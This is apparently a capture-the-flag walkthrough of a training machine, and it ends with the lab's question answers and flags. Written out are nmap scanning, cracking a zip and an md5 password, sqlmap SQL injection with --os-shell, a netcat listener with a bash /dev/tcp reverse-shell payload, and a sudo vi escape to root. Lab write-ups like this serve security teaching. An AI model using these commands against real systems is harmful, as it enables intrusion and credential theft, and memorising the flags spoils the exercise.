First part of recon is scanning.
Here we are going to actively scan the machine with nmap for services (-sV) and with script flag (-sC) to check out knowing vulnerabilities
nmap -sC -sV <target-ip>
Here we list all the ports and services we find to be open.
In open port we found
also we can see FTP anonymous login
is enabled so we can try that.
Gaining Access
This machine has security misconfiguration vulnerabilty
which can result in gaining access to unwanted user in machine.
In ftp configuration it seems that this user has left âAnonymous loginâ option on which is default setting. To harden the security it is advisable to disable that setting.
for our advantage we can get a peek in to see what this ftp service has for us to offer.
It has
file and collected it with get
It turns it zip file protected by password we need to crack it.
with zip2john
we create a hash of it
then we crack that hash with john
and with âshow we finally get the password
Upon unzipping we found two file
content of index.php revealed some credentials
username is admin
and the password is looks like md5hash we can use online tool like or cli tool like hashcat
and the password is qwerty789
lets try it
Now that we have password to web portal we can start exploiting this webservice to see if we find anything useful to further escalate. upon logging in we found it has car catalog which seems to be hosted on some kind of postgress sql server. lets see if this sql database is vulnerable to `sqli vulnerability
upon searching anything we get string on url bar
with inspect element tool i found it generated this cookie
lets find out if its vulnerable to sql injection with sqlmap
sqlmap -u '' --cookie="PHPSESSID=4s4qd6ugtiqpq0ke0ua6iqt8sv"
To our confirmation it is showing that GET parameter 'search'
is vulnerable to sql injection.
This could be exploited to get foothold into machine
this is the detail about exploit that generated by sqlmap
lets try to get shell into system with --os-shell
sqlmap -u '' --cookie="PHPSESSID=4s4qd6ugtiqpq0ke0ua6iqt8sv --os-shell
and we are in
but this is not very stable so lets create reverse shell
first setup netcat listener
nc -lvnp 443
and run this payload on victim machine (use tun0 ip) `bash -c âbash -i >& /dev/tcp/ 0>&1â
upon cd ../../ we found user.txt flag
upon inspecting further we found /var/www/html/dashboard.php
has some creds in it.
**user=postgres password=P@s5w0rd!**
we can use this to perform any task that postgres user can do.
Escalating Privileges
We need to upgrade our shell to root to be complete access over this machine and read our sweet âroot flag
but to escalate our privileges to root need to check for setuid bit
with sudo -l
we found setuid bit is set for
**(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf**
it means user postgress has permission to run pg_hba file with /bin/vi with sudo
lets try to get shell with vim
/bin/vi /etc/postgresql/11/main/pg_hba.conf
and in vim run :!/bin/bash
and we got root shell
lets check out root flag
cat /root/root.txt
and here we go at last cracked root flag. Congrats on further exploitation.
- Besides SSH and HTTP, what other service is hosted on this box? FTP
- This service can be configured to allow login with any password for specific username. What is that username? anonymous
- What is the name of the file downloaded over this service?
- What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? zip2john
- What is the password for the admin user on the website? qwerty789
- What option can be passed to sqlmap to try to get command execution via the sql injection? âos-shell
- What program can the postgres user run as root using sudo? vi
- Submit user flag ec9b13ca4d6229cd5cc1e09980965bf7
- Submit root flag dd6e058e814260bc70e9bbdef2715849